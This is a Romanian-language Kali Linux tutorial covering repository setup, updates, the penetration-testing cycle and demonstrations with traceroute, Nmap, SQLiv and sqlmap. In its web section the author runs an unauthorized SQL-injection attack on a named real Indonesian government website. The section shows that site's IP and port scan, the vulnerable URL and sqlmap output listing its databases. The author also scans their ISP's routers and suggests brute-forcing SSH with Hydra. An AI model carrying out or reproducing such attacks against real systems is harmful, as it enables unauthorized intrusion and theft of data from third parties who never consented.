Tutorial Kali Linux

Kali Linux Tutorial



Dacă sunteți un expert sau cel puțin familiarizați cu Linux, comenzi și mediu, tocmai ați instalat Kali Linux pe mașina dvs., ați dorit să deveniți un Maestru al Kali Linux sau un Etic Hacker, atunci sunteți în locul potrivit. În acest articol, voi acoperi un tutorial Kali Linux pentru utilizatorii Linux care nu sunt familiarizați deja cu Kali și vă voi începe cu unele dintre tehnicile de bază utilizate pentru hacking și testarea securității în timp ce utilizați Kali.

Ce este Kali Linux?

Kali Linux, ( lansat pentru prima dată pe 13 martie 2013 ), care a fost cunoscut oficial sub numele de BackTrack, dezvoltat de firma de securitate Offensive Security, este o distribuție criminalistică și axată pe securitate, bazată pe ramura Testare a Debian. Kali Linux este proiectat având în vedere testele de penetrare, recuperarea datelor și detectarea amenințărilor. Proiectul a trecut la un model de lansare continuă la începutul acestui an, într-un efort de a oferi mai multe utilități de securitate actualizate utilizatorilor distribuției. Kali Linux este gratuit și va fi întotdeauna. Are peste 600 de instrumente de testare a penetrării incluse.







De ce Kali Linux? Este potrivit pentru tine?

Kali Linux a câștigat multă popularitate recent. Și există un motiv în spatele acestui lucru. Hackingul a revenit ca un lucru interesant de făcut în cultura populară și acest lucru poate fi atribuit în mod semnificativ serialului TV Mr. Robot. Popularitatea domnului Robot l-a ajutat pe Kali Linux să obțină noi utilizatori. Oamenii care nu cunosc aproape nimic din Linux sau ceva legat de securitatea computerului încearcă acum să folosească Kali ca principală distribuție Linux.



Cea mai avansată distribuție de testare a penetrării noastre, vreodată. - Dezvoltatori Kali Linux. (Este scris pe pagina principală a Kali.org chiar în partea de sus a paginii.) Ce obțineți din declarația respectivă? Observați acest lucru: APTD (Advanced Penetration Testing Distribution)? Nu există niciun termen de hacking aici, literalmente. Kali Linux este același cu celelalte distribuții Linux. Pur și simplu spus, este o distribuție Linux plină de instrumente legate de securitate și orientată către experți în securitatea rețelelor și computerelor. Cu toate acestea, utilizarea Kali Linux se concentrează doar pe securitate și criminalistică.



O distribuție Linux nu este altceva decât un pachet care conține kernel-ul Linux, un set de utilități și aplicații de bază și câteva setări implicite. Deci, Kali Linux nu oferă ceva unic în acest sens, majoritatea instrumentelor furnizate ar putea fi instalate pe orice distribuție Linux.





Kali Linux este special conceput pentru a îndeplini cerințele testării penetrării profesionale și auditului de securitate. Se adresează unui anumit subset de utilizatori Linux. Pentesteri, hackeri etc. Nu este o distribuție recomandată dacă vă așteptați la Kali pentru desktop-ul Linux de uz general pentru dezvoltare, design web, jocuri, birou etc. Kali vă poate oferi unele provocări, chiar dacă sunteți un utilizator Linux cu experiență .

LUCRURI DE FĂCUT DUPĂ INSTALAREA KALI LINUX

După instalarea Kali Linux, vă puteți întreba ce să faceți în continuare, nu ?. Toată lumea se confruntă cu această problemă, nu vă faceți griji.



PASUL 1: CONFIGURAȚI REPOZITORUL

În primul rând, este posibil să știți deja acest lucru, dar este esențial să setați corect depozitul. După cum am spus, modelul Kali Linux de lansare continuă este în efortul de a oferi mai multe utilități de securitate actualizate utilizatorilor distribuției. În general, dacă aveți Kali Linux proaspăt instalat, depozitul face referință la mediul pe care îl utilizați pentru instalare. Pentru a remedia acest lucru, trebuie să schimbați depozitul în depozitul oficial Kali Linux. Fișierul necesar se află sub /etc/apt/sources.list . Deschideți fișierul cu editorul de text leafpad și înlocuiți depozitul implicit cu acest depozit oficial Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

PASUL 2: ACTUALIZAȚI ȘI ACTUALIZAȚI-VĂ KALI LINUX

După această actualizare și actualizare a sistemului, sincronizați Kali Linux cu cea mai recentă versiune. Pentru aceasta, deschideți terminalul și tastați:

apt update -y && apt upgrade -y && apt dist-upgrade 

Comanda apt update descarcă și preia pachetul listează informații din depozite și le actualizează pentru a obține informații despre cele mai noi versiuni ale pachetelor și dependențele acestora.

Comanda apt upgrade descarcă și instalează o versiune mai nouă a pachetelor pachetelor Kali Linux instalate, atâta timp cât nu are erori în dependențe.

Actualizarea apt dist va actualiza toate pachetele la cea mai nouă versiune disponibilă indiferent de ce. Și, de asemenea, instalați și eliminați dependențele după cum este necesar (instalați dependențe pentru a satisface pachetele, evident, dar eliminați și dependențele care au devenit orfane dacă un pachet care a fost actualizat nu mai are nevoie de dependență.

CONCEPTUL DE TESTARE DE PENETRARE DE BAZĂ CU KALI LINUX

După ce ați făcut cu succes acei pași, există trei lucruri principale pe care le-ați putea face cu Kali Linux pe baza sistemului vizat, inclusiv:

  1. Hacking de rețea fără fir - hacking Wifi, Phising, otrăvire ARP etc.
  2. Hackarea aplicațiilor web - SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising etc.
  3. Spargerea dispozitivului - Exploatați mașina țintă pentru a obține controlul asupra acesteia.

Nu includ hacking-ul IoT, nu înseamnă că Kali Linux nu are nicio capacitate în acest scop. Dar, literalmente, ar putea aparține și dispozitivului de piratare. Deoarece dispozitivul are aspect fizic și formă. În acest tutorial am acoperit cunoștințele de bază despre acestea. Deoarece Kali Linux este imens, nu se încadrează într-un singur articol!

De asemenea, trebuie să știți, ciclul sau procedura de testare a penetrării. Sunt:

  1. Recunoaștere - Colectare de informații
  2. Scanare
  3. Operațiune
  4. Post-exploatare

HACKING DE REȚELE FĂRĂ FĂRĂ CU KALI LINUX

În ceea ce privește hackingul rețelei wireless, victima poate varia. Deoarece, rețelele fără fir constau din mai multe lucruri, cum ar fi ISP (Internet Service Provider), routerul și colegii săi (modem, hub, comutator etc.) și clienți (utilizatori, CCTV, computer la distanță etc.). De asemenea, au posibilități vulnerabile.

Internetul este o agregare mare și complexă de hardware de rețea, conectată împreună prin gateway-uri. Urmărirea rutei pe care o urmează pachetele dvs. este importantă pentru a ști cum ajungeți la un anumit nume de gazdă sau la o adresă IP țintă.

Kali Linux are un instrument încorporat numit Traceroute. Traceroute folosește protocolul IP pentru a activa câmpul și încearcă să obțină un răspuns ICMP TIME_EXCEEDED de la fiecare gateway de-a lungul căii către o anumită gazdă. Traceroute încearcă să urmărească ruta pe care o urmează un pachet IP către o anumită gazdă de internet, lansând pachete de probă cu un TTL mic (timpul de viață), apoi ascultând un timp ICMP răspuns depășit de la o poartă. Vă voi oferi un exemplu de urmărire a unui router ISP folosit pentru a gestiona conexiunea noastră folosind Traceroute.

1. Recunoaștere

Colectarea informațiilor este cel mai important început, nu ratați acest pas. În acest pas, scopul nostru este să obținem cât mai multe informații utile pe care le-am putea obține, iar apoi aceste informații sunt utilizate pentru pași suplimentari.

Mai întâi, deschideți un terminal și tastați această comandă pentru a începe urmărirea drumului către site, în acest caz am setat site-ul pe google.com.

traceroute google.com 

Captură de ecran Traceroute

2. Scanare

Odată ce lansăm comenzile, acesta va afișa unde se îndreaptă pachetul nostru în ordine. După cum puteți vedea mai sus, am 3 hamei care dintre ele este serverul meu ISP. Primul IP de pe listă este routerul meu, care acționează ca un gateway. Iar următoarele două aparțin ISP-ului meu. Acum, să verificăm serviciul pe care îl execută folosind Nmap. Deci, țintele pe care urmează să le scanăm sunt 10.152.192.1 și 10.13.223.102 . În terminal am executat următoarea comandă:

nmap -v -sS [IP Target] -Pn 

Să descompunem argumentul comenzii:

-v = Activează modul verbozitate

-sS = Folosiți tehnica de scanare TCP SYN

-Pn = Tratează toate gazdele ca online - sări peste descoperirea gazdei

Și iată rezultatul pe care l-am obținut.

captură de ecran nmap 2

Din păcate, toate porturile pornite 10.152.192.1 sunt filtrate, înseamnă că toate conexiunile TCP primite sunt blocate de IDS sau Firewall pe acest IP. Acum, să ducem o altă scanare la a doua țintă.

captură de ecran nmap 1

3. Funcționare

În această procedură, nu am intenția de a efectua exploatarea reală, ci vă arăt cum. Pe baza rezultatului de scanare Nmap de mai sus, știm că acest IP are server SSH care rulează pe portul 22 și este deschis. Este deschis să fie forțat brutal, haha! Am găsit gaura, acest server SSH este posibila gaură în care am putea încerca să obținem acces. Există mai multe instrumente în Kali Linux care acceptă atacurile bruteforce sau din dicționar împotriva protocolului SSH. Cel mai popular și puternic este Hydra.

Ok, aceasta a fost o procedură de bază pentru efectuarea unui test de penetrare împotriva unui server vizat, care în exemplul nostru aici este serverul meu ISP.

APLICĂRI WEB HACKING CU KALI LINUX

De fapt, dacă vă pasionează acest lucru, vă puteți configura mediul de hacking instalând DWVA (Damn Vulnerable Web App) în Kali Linux. Este o aplicație web PHP / MySQL care are o grămadă de găuri vulnerabile. Principalele sale obiective sunt să fie un ajutor pentru profesioniștii din domeniul securității pentru a-și testa abilitățile și instrumentele într-un mediu legal și a ajuta dezvoltatorii web să înțeleagă mai bine procesele de securizare a aplicațiilor web. Puteți obține DWVA gratuit pe Github aici: https://github.com/ethicalhack3r/DVWA.

Deocamdată vă voi arăta cum să faceți aplicații Web Hacking pe un site real. Dar, promite-mi că se limitează doar la scop educativ. Vom simula un atac real pe site-ul real folosind injecția SQL.

Condiție prealabilă

Instrumente acoperite:

- Whatweb (preinstalat)

- Nmap (preinstalat)

- SQLiv (instalare manuală)

- SQLMap (preinstalat)

Avem nevoie de încă un instrument suplimentar care este disponibil pe Github aici: https://github.com/Hadesy2k/sqliv, instalați-l mai întâi pe Kali Linux. Acest instrument numit SQLiv, care este capabil să efectueze scanări direcționate prin furnizarea unui domeniu specific (cu accesarea cu crawlere). Tastați terminalul:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Țintă: www.trenggalekkab.go.id

1. Recunoaștere

Colectăm cât de multe informații utile am putea obține. Am putea deschide pagina web și să detectăm ce aplicație rulează pe acest site. În primul rând, să verificăm ce fel de site este. Vom folosi whatweb pentru a face asta.

whatweb www.trenggalekkab.go.id 

Ce captură de ecran web

După cum puteți vedea rezultatul de mai sus, ținta se află în Indonezia. Se rulează Apache v2.2.27 pe serverul său web și are, de asemenea PHP v5.4.31 , are o adresă IP 103.247.21.142 . Bine, ia notă de asta. Poate fi necesar să vizitați pagina sa web, căutând fișierul sau pagina construită, parametrii URL sau chiar formularul de autentificare. Deocamdată avem nevoie de acea adresă IP pentru următorul pas care este scanarea.

2. Scanare

Ca și înainte, folosim din nou Nmap pentru a scana ce porturi și servicii rulează pe țintă.

nmap -v -sS 103.247.21.142 

Iată rezultatul pe care l-am obținut:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Există o grămadă de porturi deschise care gestionează fiecare serviciu pe țintă, dar cel care pare atrăgător este serviciul mysql de pe portul 3306. Este indicat faptul că acest site folosește mysql să-și gestioneze informațiile în baze de date. Apoi, mă întreb dacă există vulnerabilități SQL Injection pe acest site. Deci, scanez site-ul din nou folosind SQLiv pe care tocmai l-am instalat. Am tastat comanda:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Am găsit 2 posibile adrese URL vulnerabile SQL pe acest site. Rețineți acele adrese URL.

3. Funcționare

Ok, avem adrese URL vulnerabile SQL și sunt pregătite pentru execuție. Pentru a face acest lucru vom folosi SQLMap. Sintaxa este:

sqlmap [Vulnerable URL] --dbs 

Comanda ar trebui să arate astfel:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argumentul –dbs este de a spune SQLMap să obțină baze de date țintă. Iată rezultatul obținut:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap a găsit 2 baze de date, dar numai una dintre ele care conține date sensibile, cum ar fi un cont de acreditare de administrator. Aceasta este pe trengkab_trg. După ce am găsit bazele de date, mai trebuie să facem un alt pas. Adică să găsiți tabelele și coloanele, iar ultimul pas este să aruncați datele. Nu vă voi arăta cum, aici, în această secțiune, folosind această țintă. Cel puțin știți ideea de bază privind ciclul de atac și folosind unele instrumente.

HACKING DE DISPOZITIVE

Într-un articol viitor de pe acest site vom acoperi hacking-ul dispozitivului, rămâneți la curent. Ca o avertizare prealabilă, veți dori să vă asigurați că cunoașteți Python pentru aceasta.